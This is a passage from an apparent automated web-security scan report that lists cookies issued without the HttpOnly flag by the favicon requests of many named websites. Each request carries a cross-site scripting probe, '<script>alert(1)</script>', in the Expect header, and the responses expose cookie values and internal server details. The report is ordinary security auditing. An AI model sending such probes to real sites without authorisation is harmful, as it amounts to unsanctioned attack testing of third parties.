Expect: <script>alert(1)</script>

Response

HTTP/1.1 404 Not Found
Content-Length: 16876
Content-Type: text/html
X-Powered-By: ASP.NET
Date: Wed, 04 May 2011 04:07:32 GMT
Set-Cookie: TSd4791c=3da448000bf4625f33f8ce6cb5f077a1e13291874ab59a244dc0d104; Path=/
Vary: Accept-Encoding, User-Agent

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head><script type="text/javascr
...[SNIP]...

15.166. http://www.indiebound.org/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.indiebound.org
Path:   /favicon.ico

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.indiebound.org
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 417 Expectation Failed
Date: Wed, 04 May 2011 01:29:38 GMT
Server: Apache/2.2.16 (EL)
Content-Length: 469
Connection: close
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: SERVERID=Vonnegut.booksense.local; path=/

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>417 Expectation Failed</title>
</head><body>
<h1>Expectation Failed</h1>
<p>The expectation given in the Expect request-header
fi
...[SNIP]...

15.167. http://www.intellichoice.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.intellichoice.com
Path:   /favicon.ico

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.intellichoice.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 01:11:25 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=nd2hgt454l5cng55np4rs3mo; path=/; HttpOnly
Set-Cookie: UserPuid=2307924506250447917; domain=intellichoice.com; expires=Wed, 04-May-2061 01:11:25 GMT; path=/
Cache-Control: private
Content-Type: image/x-icon
Content-Length: 43

GIF89a.......|.8...!.......,...........D..;

15.168. http://www.ip-lookup.net/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.ip-lookup.net
Path:   /favicon.ico

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.ip-lookup.net
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 417 Expectation Failed
Set-Cookie: 720plan=R1791055375; path=/; expires=Fri, 06-May-2011 13:36:46 GMT
Date: Wed, 04 May 2011 01:32:19 GMT
Server: Apache/2.2.X (OVH)
Vary: Accept-Encoding
Content-Length: 389
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>417 Expectation Failed</title>
</head><body>
<h1>Expectation Failed</h1>
<p>The expectation given in the Expect request-header
fi
...[SNIP]...

15.169. http://www.isound.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.isound.com
Path:   /favicon.ico

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.isound.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 200 OK
Server: cloudflare-nginx
Date: Wed, 04 May 2011 02:15:29 GMT
Content-Type: image/x-icon
Connection: keep-alive
Content-Length: 0
Last-Modified: Wed, 09 Feb 2011 18:51:34 GMT
CF-Cache-Status: HIT
Expires: Wed, 04 May 2011 04:15:29 GMT
Cache-Control: public, max-age=7200
Accept-Ranges: bytes
Set-Cookie: __cfduid=d526f9ec98a9edddada4718d87803ccaf1304475329; expires=Mon, 23 Dec 2019 23:50:00 GMT; path=/; domain=.isound.com
Set-Cookie: __cfduid=d526f9ec98a9edddada4718d87803ccaf1304475329; expires=Mon, 23 Dec 2019 23:50:00 GMT; path=/; domain=.www.isound.com


15.170. http://www.jacksonhewitt.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.jacksonhewitt.com
Path:   /favicon.ico

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.jacksonhewitt.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 417 Expectation Failed
Set-Cookie: JH227=VLKUKIS172.16.128.61CKMWO; path=/
Content-Length: 0
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Wed, 04 May 2011 02:35:22 GMT


15.171. http://www.jobilephones.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.jobilephones.com
Path:   /favicon.ico

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.jobilephones.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.0 417 Unknown
Content-Type: text/html
Date: Wed, 04 May 2011 00:50:51 GMT
Content-Length: 60
Set-Cookie: 7s51872mp2=805470218.20480.0000; path=/
Connection: close

The page cannot be displayed because the expectation failed.

15.172. http://www.jpeterman.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.jpeterman.com
Path:   /favicon.ico

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.jpeterman.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 302 Found
Cache-Control: private
Content-Length: 218
Content-Type: text/html; charset=utf-8
Location: http://www.jpeterman.com/!dG0m!Z2IAO!4ny4UbWmoBQ!/404.rsp?404;http://www.jpeterman.com:80/favicon.ico
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
Set-Cookie: ThePage_ECommerce_STATE=dG0m+Z2IAO+4ny4UbWmoBQ; path=/
Date: Wed, 04 May 2011 01:19:37 GMT

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="http://www.jpeterman.com/!dG0m!Z2IAO!4ny4UbWmoBQ!/404.rsp?404;http://www.jpeterman.com:80/favicon.ico">here</a>.</h2>
...[SNIP]...

15.173. http://www.jtvauctions.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.jtvauctions.com
Path:   /favicon.ico

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.jtvauctions.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 417 Expectation Failed
Content-Length: 0
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Wed, 04 May 2011 02:41:10 GMT
Set-Cookie: BIGipServerjtvauctions-80=2030860298.20480.0000; path=/


15.174. http://www.kennedyspacecenter.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.kennedyspacecenter.com
Path:   /favicon.ico

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.kennedyspacecenter.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 200 OK
Connection: keep-alive
Date: Wed, 04 May 2011 03:10:12 GMT
Server: Microsoft-IIS/6.0
cache-control: must-revalidate
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=txtvce55qssba0451dbduy45; path=/; HttpOnly
Set-Cookie: KSCPrefs=FontSize=1; expires=Sat, 04-Jun-2011 03:10:12 GMT; path=/
Set-Cookie: KSCPrefs=FontSize=1; expires=Sat, 04-Jun-2011 03:10:12 GMT; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 30133
Vary: Accept-Encoding


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="pagehead"><!-- PageID
...[SNIP]...

15.175. http://www.kidfanatics.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.kidfanatics.com
Path:   /favicon.ico

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.kidfanatics.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 417 Expectation Failed
Content-Length: 0
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: TLTHID=06CBD9004C8F76C2A0021C9D122C29C4; Path=/; Domain=.kidfanatics.com
Set-Cookie: TLTSID=06CBD9004C8F76C2A0021C9D122C29C4; Path=/; Domain=.kidfanatics.com
Date: Wed, 04 May 2011 03:46:30 GMT
Set-Cookie: BIGipServerFFPartners-Pool=bUT17+fFku+LNJZCkOXOBIiay3o9W/ClYS14WCvpKUTDZisnEcDsbRdAqmBSJPXvIoRAlblbnQ==; path=/


15.176. http://www.kisw.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.kisw.com
Path:   /favicon.ico

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.kisw.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 417 Expectation Failed
Date: Wed, 04 May 2011 02:15:10 GMT
Server: Apache/1.3.29 (Unix) mod_gzip/1.3.26.1a PHP/4.2.3
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: BIGipServerRadio_Pool=3574614083.20480.0000; path=/
Content-Length: 435

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<HTML><HEAD>
<TITLE>417 Expectation Failed</TITLE>
</HEAD><BODY>
<H1>Expectation Failed</H1>
The expectation given in the Expect request-header
field
...[SNIP]...

15.177. http://www.krcrtv.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.krcrtv.com
Path:   /favicon.ico

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.krcrtv.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 200 OK
Server: Apache/2.2.3 (Red Hat)
Last-Modified: Wed, 21 Jul 2010 14:43:09 GMT
ETag: "7020e4b-47e-d2031940"
Accept-Ranges: bytes
Content-Length: 1150
Content-Type: text/plain
Cache-Control: max-age=695
Expires: Wed, 04 May 2011 03:19:52 GMT
Date: Wed, 04 May 2011 03:08:17 GMT
Connection: close
Set-Cookie: alpha=5dce8f18a260000021c3c04d4b910300feae0000; expires=Sat, 01-May-2021 03:08:17 GMT; path=/; domain=.krcrtv.com

............ .h.......(....... ..... .....@....................]B..]B..]B..]B..]B..]B..]B..]B..]B..]B..]B..]B..]B..]B..]B..]B..]B..]B..]B..]B..[E..tj..................|t..\I..]B..]B..]B..]B..]B..]B..c
...[SNIP]...

15.178. http://www.ksfcu.org/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.ksfcu.org
Path:   /favicon.ico

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.ksfcu.org
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 404 Not Found
Content-Length: 2690
Content-Type: text/html
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Wed, 04 May 2011 03:32:53 GMT
Set-Cookie: BIGipServerwwwpool=Lpkdnfjw/0eiWjewBiFEQBRnhX3bBDAmIpmrvYCE9Bc1A6A75AwGeNYG5xV783e+6uiGgTXtyrsdaQ==; path=/


<html>
<head>
   <title>Kern Schools Federal Credit Union</title>
   <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
   <link rel="stylesheet" type="text/css" href="/fnf/Conta
...[SNIP]...

15.179. http://www.kvh.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.kvh.com
Path:   /favicon.ico

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.kvh.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 302 Found
Set-Cookie: SOM=ZVLKLNSPVW290CKIOL; path=/
Cache-Control: private
Content-Length: 162
Content-Type: text/html; charset=utf-8
Location: /Page-Not-Found.aspx?url=/favicon.ico
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
Set-Cookie: website#sc_wede=1; path=/
X-Powered-By: ASP.NET
Date: Wed, 04 May 2011 02:01:09 GMT

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="%2fPage-Not-Found.aspx%3furl%3d%2ffavicon.ico">here</a>.</h2>
</body></html>

15.180. http://www.leaderinsurance.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.leaderinsurance.com
Path:   /favicon.ico

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.leaderinsurance.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 404 Not Found
Content-Type: text/html
Server: Microsoft-IIS/7.0
Set-Cookie: TLTSID=C7FADEDB4C960E530058E3A045D2BB64; Path=/; Domain=.leaderinsurance.com
Set-Cookie: TLTUID=C7FADEDB4C960E530058E3A045D2BB64; Path=/; Domain=.leaderinsurance.com; expires=Wed, 04-05-2021 04:10:29 GMT
HostName: BHMWS12A2
X-Powered-By: ASP.NET
Date: Wed, 04 May 2011 04:10:29 GMT
Content-Length: 1245

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" cont
...[SNIP]...

15.181. http://www.learnatest.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.learnatest.com
Path:   /favicon.ico

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.learnatest.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 417 Expectation Failed
Cache-Control: Private
Content-Length: 0
Expires: Now
Server: Microsoft-IIS/6.0
Date: Wed, 04 May 2011 03:51:53 GMT
Set-Cookie: BIGipServerhttp_80_LAT=1409394880.20480.0000; path=/


15.182. http://www.leoncountyfl.gov/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.leoncountyfl.gov
Path:   /favicon.ico

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.leoncountyfl.gov
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 417 Expectation Failed
Set-Cookie:WEBTRENDS_ID=173.193.214.243-1515246960.30149115; expires=Thu, 03-May-2012 01:34:04 GMT; path=/
Set-Cookie:WEBTRENDS_ID=173.193.214.243-1515246960.30149115; expires=Thu, 03-May-2012 01:34:04 GMT; path=/
Date: Wed, 04 May 2011 01:34:04 GMT
Content-Length: 0
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET


15.183. http://www.lexingtonlaw.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.lexingtonlaw.com
Path:   /favicon.ico

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.lexingtonlaw.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 417 Expectation Failed
Date: Wed, 04 May 2011 03:06:14 GMT
Server: Apache
Content-Length: 389
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: Coyote-2-c0a88784=a0c021e:0; path=/

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>417 Expectation Failed</title>
</head><body>
<h1>Expectation Failed</h1>
<p>The expectation given in the Expect request-header
fi
...[SNIP]...

15.184. http://www.lifestreetmedia.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.lifestreetmedia.com
Path:   /favicon.ico

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.lifestreetmedia.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 200 OK
Server: nginx
Date: Wed, 04 May 2011 00:59:41 GMT
Content-Type: image/x-icon
Connection: keep-alive
Keep-Alive: timeout=10
Last-Modified: Mon, 13 Apr 2009 13:26:06 GMT
Accept-Ranges: bytes
Content-Length: 1150
Cache-Control: max-age=3600
Expires: Wed, 04 May 2011 01:59:41 GMT
Set-Cookie: cs=ip633-T90ZfZYOdHzaaZpeOVT3cA; path=/; domain=.www.lifestreetmedia.com

............ .h.......(....... ..... ....................................................................0..............................................E........../........+..........................
...[SNIP]...

15.185. http://www.loan.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.loan.com
Path:   /favicon.ico

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.loan.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 417 Expectation Failed
Date: Wed, 04 May 2011 02:17:56 GMT
Server: Apache
Content-Length: 389
X-Cnection: close
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: BIGipServerloan_pool=1071911084.0.0000; path=/

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>417 Expectation Failed</title>
</head><body>
<h1>Expectation Failed</h1>
<p>The expectation given in the Expect request-header
fi
...[SNIP]...

15.186. http://www.longabergerhomesteadstore.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.longabergerhomesteadstore.com
Path:   /favicon.ico

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.longabergerhomesteadstore.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 404 Not Found
Set-Cookie: tlcnj4-http-cookie=R3651926190; path=/
Content-Length: 1635
Content-Type: text/html
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Wed, 04 May 2011 01:15:06 GMT

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<HTML><HEAD><TITLE>The page cannot be found</TITLE>
<META HTTP-EQUIV="Content-Type" Content="text/html; cha
...[SNIP]...

15.187. http://www.lrn.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.lrn.com
Path:   /favicon.ico

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.lrn.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 417 Expectation Failed
Date: Wed, 04 May 2011 00:45:46 GMT
Server: LWS
Content-Length: 389
Connection: close
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: BIGipServermarketing=1660227136.20480.0000; path=/

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>417 Expectation Failed</title>
</head><body>
<h1>Expectation Failed</h1>
<p>The expectation given in the Expect request-header
fi
...[SNIP]...

15.188. http://www.macmillanmh.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.macmillanmh.com
Path:   /favicon.ico

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.macmillanmh.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 417 Expectation Failed
Set-Cookie: ARPT=QPRLQYSmarshall2163CKULJ; path=/
Date: Wed, 04 May 2011 01:10:56 GMT
Server: Apache/1.3.34 (Debian)
Content-Type: text/html; charset=iso-8859-1
Content-Length: 366

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<HTML><HEAD>
<TITLE>417 Expectation Failed</TITLE>
</HEAD><BODY>
<H1>Expectation Failed</H1>
The expectation given in the Expect request-header
field
...[SNIP]...

15.189. http://www.manhunt.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.manhunt.com
Path:   /favicon.ico

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.manhunt.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 417 Expectation Failed
Date: Wed, 04 May 2011 01:01:46 GMT
Server: Apache/2.2.10 (Unix)
Content-Length: 509
Connection: close
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: sramigpsy=325978634.20480.0000; path=/

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>417 Expectation Failed</title>
</head><body>
<h1>Expectation Failed</h1>
<p>The expectation given in the Expect request-header
fi
...[SNIP]...

15.190. http://www.marriottvacationclub.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.marriottvacationclub.com
Path:   /favicon.ico

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.marriottvacationclub.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 01:03:55 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 10064
Content-Type: text/html
Via: 1.1 mcoatprdslb2 (Juniper Networks Application Acceleration Platform - DX 5.3.2 0)
Set-Cookie: rl-sticky-key=0ace8fd9; path=/; expires=Wed, 04 May 2011 01:08:57 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html>
<head>
<META http-equiv="Content-Type" content="text/html; charset=UTF-8">
<title>Marriott
...[SNIP]...

15.191. http://www.mctennessee.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.mctennessee.com
Path:   /favicon.ico

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.mctennessee.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 417 Expectation Failed
Date: Wed, 04 May 2011 03:09:49 GMT
Server: Apache
Content-Length: 389
Connection: close
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: BIGipServerPOOL_74.205.90.114=4191858954.20480.0000; path=/

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>417 Expectation Failed</title>
</head><body>
<h1>Expectation Failed</h1>
<p>The expectation given in the Expect request-header
fi
...[SNIP]...

15.192. http://www.meandmylatina.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.meandmylatina.com
Path:   /favicon.ico

Issue detail

